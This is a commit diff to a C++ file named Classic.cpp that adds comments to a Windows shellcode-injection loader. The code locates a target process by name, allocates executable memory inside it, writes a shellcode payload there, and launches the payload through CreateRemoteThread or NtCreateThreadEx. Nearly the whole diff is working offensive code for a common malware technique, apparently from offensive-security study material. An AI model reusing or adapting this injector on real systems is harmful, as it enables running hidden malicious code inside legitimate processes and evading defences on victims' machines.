Update Classic.cpp

Nero22k · Jan 25, 2021 · b8509f6 · b8509f6
1 parent f7a23e4
commit b8509f6
Showing 1 changed file with 19 additions and 10 deletions.
diff --git a/Classic.cpp b/Classic.cpp
@@ -43,17 +43,22 @@ int FindTarget(const char *procname) {
         HANDLE hProcSnap;
         PROCESSENTRY32 pe32;
         int pid = 0;
-
+
+        //Take a snapshot of all processes in the system.        
         hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
         if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
-
-        pe32.dwSize = sizeof(PROCESSENTRY32); 
-
+
+        // Set the size of the structure before using it        
+        pe32.dwSize = sizeof(PROCESSENTRY32);
+
+        // Retrieve information about the first process,
+  	// and exit if unsuccessful        
         if (!Process32First(hProcSnap, &pe32)) {
                 CloseHandle(hProcSnap);
                 return 0;
         }
-
+
+	// Loops through the process list and looks for maching string.
         while (Process32Next(hProcSnap, &pe32)) {
                 if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
                         pid = pe32.th32ProcessID;
@@ -62,7 +67,8 @@ int FindTarget(const char *procname) {
         }
 
         CloseHandle(hProcSnap);
-
+
+	//Returns the pid of target process.
         return pid;
 }
 
@@ -72,10 +78,11 @@ int Inject(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
 
 	LPVOID pRemoteCode = NULL;
 	HANDLE hThread = NULL;
-
+  	//Creates a buffer in memory for shellcode.
 	pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+	//Copies the shellcode into the allocated buffer space.
 	WriteProcessMemory(hProc, pRemoteCode, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL);
-
+	//Triggers the shellcode.
 	hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE) pRemoteCode, NULL, 0, NULL);
 	if (hThread != NULL) {
 			WaitForSingleObject(hThread, 500);
@@ -95,12 +102,14 @@ int Inject2(HANDLE hProc, unsigned char * payload, unsigned int payload_len) {
 
 	//RtlCreateUserThread_t pRtlCreateUserThread = (RtlCreateUserThread_t) GetProcAddress(GetModuleHandle("NTDLL.DLL"), "RtlCreateUserThread");
 	NtCreateThreadEx_t pNtCreateThreadEx = (NtCreateThreadEx_t) GetProcAddress(GetModuleHandle("NTDLL.DLL"), "NtCreateThreadEx");
-
+	//Creates a buffer in memory for shellcode.
 	pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
+	//Copies the shellcode into the allocated buffer space.
 	WriteProcessMemory(hProc, pRemoteCode, (PVOID) payload, (SIZE_T) payload_len, (SIZE_T *) NULL);
 
 	//pRtlCreateUserThread(hProc, NULL, FALSE, 0, 0, 0, pRemoteCode, 0, &hThread, &cid);
-
+
+ 	//Triggers the shellcode.
 	pNtCreateThreadEx(&hThread, GENERIC_ALL, NULL, hProc, (LPTHREAD_START_ROUTINE) pRemoteCode, NULL, NULL, NULL, NULL, NULL, NULL);   //Executes the payload
 	if (hThread != NULL) {
 			WaitForSingleObject(hThread, 500);